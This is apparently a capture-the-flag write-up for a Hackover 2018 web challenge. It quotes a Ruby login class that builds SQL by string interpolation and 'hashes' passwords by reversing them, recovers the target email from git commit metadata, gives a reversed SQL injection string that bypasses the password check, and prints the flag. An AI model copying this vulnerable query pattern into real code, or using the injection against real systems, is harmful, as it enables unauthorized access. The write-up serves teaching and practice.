Tags: sqli github 

Rating: 0

**Description**

> Howdy mate! Just login and hand out the flag, aye! You can find on [h18johndoe](https://github.com/h18johndoe/user_repository/blob/master/user_repo.rb) has all you need!
>
> `http://yo-know-john-dow.ctf.hackover.de:4567/login`
>
> alternative: `46.101.157.142:4567/login`

**No files provided**

**Solution**

We get a simple login screen, but no way to register:

![](https://github.com/EmpireCTF/empirectf/raw/master/writeups/2018-10-05-Hackover-CTF/screens/do-you-know-john-dows.png)

First we need a username. `h18johndoe` from the description doesn't work. Well, we can have a look at the link from the description, which seems to show the source code for back end of this website:

```ruby
class UserRepo

def initialize(database)
@database = database
@users = database[:users]
end

def login(identification, password)
hashed_input_password = hash(password)
query = "select id, phone, email from users where email = '#{identification}' and password_digest = '#{hashed_input_password}' limit 1"
puts "SQL executing: '#{query}'"
@database[query].first if user_exists?(identification)
end

def user_exists?(identification)
!get_user_by_identification(identification).nil?
end

private

def get_user_by_identification(identification)
@users.where(phone: identification).or(email: identification).first
end

def hash(password)
password.reverse
end

end
```

The `login` method has a clear SQL injection, since the password "hashing" just reverses the input we give it, without any sanitising. Before `login` is called however, we need to pass the `user_exists?` check, which seems to use prepared statements. So we still need an existing e-mail.

The file above has commits from two users, `h18johndoe` and `john1234`. GitHub doesn't seem to show e-mail addresses of users, but if we clone the repo and check the commit log, we can see the e-mails:

```
$ git log
commit b26aed283d56c65845b02957a11d90bc091ac35a
Author: John Doe <angelo_muh@yahoo.org>
Date: Tue Oct 2 23:55:57 2018 +0200

Add login method

commit 5383fb4179f1aec972c5f2cc956a0fee07af353a
Author: John Doe <jamez@hemail.com>
Date: Tue Oct 2 23:04:13 2018 +0200

Add methods

commit 2d3e1dc0c5712efd9a0c7a13d2f0a8faaf51153c
Author: John Doe <john_doe@gmail.com>
Date: Tue Oct 2 23:02:26 2018 +0200

Add dependency injection for database

commit 3ec70acbf846037458c93e8d0cb79a6daac98515
Author: John Doe <john_doe@notes.h18>
Date: Tue Oct 2 23:01:30 2018 +0200

Add user repo class and file
```

And the last one (earliest commit chronologically) is actually the correct e-mail address: `john_doe@notes.h18`. After entering this e-mail we get asked for the password, and this is where we can do the SQL injection, since we don't know the user's password.

We only need to login, so we can do an extremely simple injection:

input: 'or''=='
reverse: '==''ro'
full query after injection and re-reverse:
select id, phone, email from users where email = 'john_doe@notes.h18'
and password_digest = ''or '' == '' limit 1

`hackover18{I_KN0W_H4W_70_STALK_2018}`